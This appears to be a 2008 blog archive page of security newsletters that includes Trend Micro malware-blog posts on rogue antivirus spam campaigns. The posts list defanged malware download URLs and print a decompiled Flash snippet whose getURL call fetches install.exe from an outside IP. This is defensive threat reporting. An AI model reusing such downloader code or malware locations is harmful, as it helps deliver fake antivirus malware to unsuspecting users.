Showing newest 3 of 18 posts from 2008-08-24. Show older posts
Showing newest 3 of 18 posts from 2008-08-24. Show older posts

Saturday, August 30, 2008

[Lockergnome] Computer Security ~ August 30, 2008

Lockergnome
Lockergnome's Computer Security ~ August 30, 2008   



Windows XP Professional Security: When you give a user a workstation, often the user views it as personal property and begins loading it down with stuff that can threaten the security of your organization. This TechProGuide shows you how to regain security over the desktop. [ Available in PDF Format for $9.95 / Download ]... [Click Here to Download]

Lockergnome help - Antivirus Discussions

Lockergnome help - Trojans/Spyware Discussions

Lockergnome help - Antivirus Discussions - General Discussions

Lockergnome help - Antivirus Discussions - McAfee

Lockergnome help - Antivirus Discussions - Symantec/Norton

Lockergnome help - Antivirus Discussions - AVG

Lockergnome help - Antivirus Discussions - F-PROT

Lockergnome help - Antivirus Discussions - Panda

Lockergnome help - Antivirus Discussions - Free Antivirus

Lockergnome help - Antivirus Discussions - Others

Lockergnome help - Trojans/Spyware Discussions - General Discussions

Lockergnome help - Trojans/Spyware Discussions - Lavasoft Ad-Aware

Lockergnome help - Trojans/Spyware Discussions - Webroot Spy Sweeper

Windows Fanatics
Linux Fanatics
OS X Fanatics
IT Professionals
Web Developers
Problem Solvers
Tech News Watch
RSS & Atom Tips
New Downloads
Exclusive Focus
Bargain Hunter
DVD Deals
Technobabble
Game Invasion
Hardware Help
Media Center
Mobile Lifestyle
Search Engineer
Political Geeks
Office Help
Computer Security

CTube!: CTube! New Version Released! Watch uncensored news, music video, educational, and entertainment channels and more... The new version of CTube! is the largest resource available for viewing Internet Television with over 1,700 channels of TV, Live Video Channels, and Webcams. This version contains an Internet Video Search with over 2 million videos. It?s hard to imagine you?ll run out of entertainment. You can watch uncensored news, music video, educational, and entertainment channels from around the... [Click Here to Download]

Administrivia

Tech Help and How To

Windows Fanatics
Linux Fanatics
OS X Fanatics
IT Professionals
Web Developers
Problem Solvers
Tech News Watch
RSS & Atom Tips
New Downloads
Exclusive Focus
Bargain Hunter
DVD Deals
Technobabble
Game Invasion
Hardware Help
Media Center
Mobile Lifestyle
Search Engineer
Political Geeks
Office Help
Computer Security






» Lotus Deluxe
» eMailTrackerPro
» 3D Haunted Dungeon Screensaver
» Visual IP Trace 2006
» Digital Media Converter v2.71
» Disk Redactor
» Dr.Web CureIt!
» 3CX Phone System for Windows Free
» SC-DiskInfo
» ProxyChecker.Net (1.0.0.23)


TrendLabs | Malware Blog - by Trend Micro - 2 new articles

 

Your email updates, powered by FeedBlitz

 
Here are the latest updates for security-news@awsoda.net

"TrendLabs | Malware Blog - by Trend Micro" - 2 new articles

  1. Paris Hilton Hits the Rogue AV Scene
  2. Spammed SWF URLs Abuse ImageShack, Lead to Rogue AV
  3. More Recent Articles
  4. Search TrendLabs | Malware Blog - by Trend Micro

Paris Hilton Hits the Rogue AV Scene

What is it with Paris Hilton these days? Just this week we’ve seen several pictures of the celebrity in a spam run that is yet again pushing rogue AV.

Although we’re quite familiar with the social engineering technique involved in name-dropping celebrities in order to pique more interest (and therefore hits), the last celebrity we’ve seen in the run was Angelina Jolie — around the time of the release of the movie Wanted, in which she starred.

These spammers are apparently in touch with the pop culture scene, as Paris followers (and naysayers) from all over the world are by now intimately familiar with that viral video where Paris says, “I want America to know that I’m, like, totally ready to lead.” This was in answer to the John McCain ad where a clip of his opponent Barack Obama was placed between a Paris Hilton and Britney Spears footage, implying that Obama is mereley a celebrity.


Figure 1. Spammers play off off-beat mainstream news.

Trend Micro Advanced Threats Researcher Jamz Yaneza tells us that tempted users who open the message will find any of the following URLs in the message body:

  • hxxp://www.{BLOCKED}n-gmbh.de/video_1.exe
  • hxxp://{BLOCKED}tchmansearch.com/video_1.exe
  • hxxp://www.{BLOCKED}ic.com/video_1.exe
  • hxxp://{BLOCKED}ypaypower.com/video_1.exe
  • hxxp://{BLOCKED}ports.com.ar/stream.exe
  • hxxp://{BLOCKED}ton.adm.br/stream.exe
  • hxxp://{BLOCKED}oynegociosinmobiliarios.com/stream.exe
  • hxxp://{BLOCKED}eb.com.ar/stream.exe
  • hxxp://www.{BLOCKED}ance.com/player.exe
  • hxxp://{BLOCKED}arana.com.ar/player.exe
  • hxxp://{BLOCKED}-chloride.com/player.exe
  • hxxp://www.{BLOCKED}webgroup.com/player.exe
  • hxxp://{BLOCKED}rastour.com/player.exe
  • hxxp://www.{BLOCKED}eemann.ch/play.exe

And that clicking the link to the “video” leads to the download of components detected by Trend Micro as TROJ_FAKEAV.FP and TROJ_FAKEAV.FW.

While we are indeed detecting a trend that rogue AV programs are having a field day in the past few weeks, the volume of unique Paris-related spam-for-rogue-AV attacks and the actual victims (a big chunk of whom are from North America based on our Virus Tracking Center) say that this particular social engineering technique does click.

Never mind if the spam doesn’t make sense…


Figure 2. Paris spam pushing rogue AV, sample 2

…isn’t even remotely sensational…


Figure 3. Paris spam pushing rogue AV, sample 3

…or just too good to be true.


Figure 4. Paris spam pushing rogue AV, sample 4

All URLs and spam mail mentioned above are already blocked by the Smart Protection Network.

Recent reports of rogue AV in the blog:



Spammed SWF URLs Abuse ImageShack, Lead to Rogue AV

We’re seeing a lot of spam right now using the now annoyingly familiar Free Update Windows XP,Vista spam template. This time though, instead of linking to an .EXE file, it is now pointing to an .SWF file.


Figure 1. Seen before: Spam announcing a free update for Windows XP and Vista

The SWF file linked via the large-font text Free Update Windows XP,Vista contains Flash ActionScript. One of the SWFs captured decompiles to the following (http changed to hxxp where it occurs below):

movie '82029540ui0.swf' { // flash 6, total frames: 3, frame rate: 50 fps, 978x580 px, compressed   // unknown tag 777 length 3   movieClip 5 TextBox {  }   frame 2 {  getURL('hxxp://89.xx.49.18/install.exe', '_self');  }   frame 3 {  stop();  } }

This is what it looks like when opened in a browser.


Figure 2. Seen just now: SWF files instead of the typical EXE.

Running the install.exe will make the desktop look like this.


Figure 3. Seen before: “WARNING! Spyware detected!”

After this a EULA window appears, and then the system proceeds to install a rogue AV software from avxp-2008.net. Note that it does this automatically from the moment the install.exe is run:


Figure 4. Yet another rogue AV product hosted on a fresh domain (this one created August 20).

The technique used in the spam has two things going for it: 1. the use of SWF instead of EXE and 2. the use of an ImageShack-hosted file, both of which may suggest to normal users that the file is possibly harmless. So it seems the siege of rogue AV is not only not dying down, its proponents are becoming more creative in their “advertising” schemes.

We detect this rogue AV as TROJ_FAKEAV.IG.



More Recent Articles



Click here to safely unsubscribe now from "TrendLabs | Malware Blog - by Trend Micro" or change subscription settings

 
Unsubscribe from all current and future newsletters powered by FeedBlitz
Your requested content delivery powered by FeedBlitz, LLC, 9 Thoreau Way, Sudbury, MA 01776, USA. +1.978.776.9498

 

Friday, August 29, 2008

[Lockergnome] Computer Security ~ August 29, 2008

Lockergnome
Lockergnome's Computer Security ~ August 29, 2008   



3D Matrix Screensaver: Inside the Matrix: Do you want to see what's inside the Matrix? Well, you don't need to take the red pill and you'll always be able to return. This brand new 3D Matrix Screensaver will take you there in no time. Your screen will become the gate to numerous worlds of the Matrix. They will fly by, and as you get closer, you'll be able to decipher the code and see what they are like! By Terminal Studio.... [Click Here to Download]

Lockergnome help - Antivirus Discussions

Lockergnome help - Trojans/Spyware Discussions

Lockergnome help - Antivirus Discussions - General Discussions

Lockergnome help - Antivirus Discussions - McAfee

Lockergnome help - Antivirus Discussions - Symantec/Norton

Lockergnome help - Antivirus Discussions - AVG

Lockergnome help - Antivirus Discussions - F-PROT

Lockergnome help - Antivirus Discussions - Panda

Lockergnome help - Antivirus Discussions - Free Antivirus

Lockergnome help - Antivirus Discussions - Others

Lockergnome help - Trojans/Spyware Discussions - General Discussions

Lockergnome help - Trojans/Spyware Discussions - Lavasoft Ad-Aware

Lockergnome help - Trojans/Spyware Discussions - Webroot Spy Sweeper

Windows Fanatics
Linux Fanatics
OS X Fanatics
IT Professionals
Web Developers
Problem Solvers
Tech News Watch
RSS & Atom Tips
New Downloads
Exclusive Focus
Bargain Hunter
DVD Deals
Technobabble
Game Invasion
Hardware Help
Media Center
Mobile Lifestyle
Search Engineer
Political Geeks
Office Help
Computer Security

How to Use Polls and Surveys That Brand You as an Expert: Polls, surveys and white papers are valuable publicity tools because they tip off reporters to emerging trends. Often, they provide nuggets ofinformation that don't take up a lot of space in print publications. Learn the secrets of successful polling. [ Expert Advice for $9 / Download ]... [Click Here to Download]

Administrivia

Tech Help and How To

Windows Fanatics
Linux Fanatics
OS X Fanatics
IT Professionals
Web Developers
Problem Solvers
Tech News Watch
RSS & Atom Tips
New Downloads
Exclusive Focus
Bargain Hunter
DVD Deals
Technobabble
Game Invasion
Hardware Help
Media Center
Mobile Lifestyle
Search Engineer
Political Geeks
Office Help
Computer Security






» Lotus Deluxe
» eMailTrackerPro
» 3D Haunted Dungeon Screensaver
» Visual IP Trace 2006
» Digital Media Converter v2.71
» Disk Redactor
» Dr.Web CureIt!
» 3CX Phone System for Windows Free
» SC-DiskInfo
» ProxyChecker.Net (1.0.0.23)


Subscribe via email

Enter your email address:

Delivered by FeedBurner

Blog Archive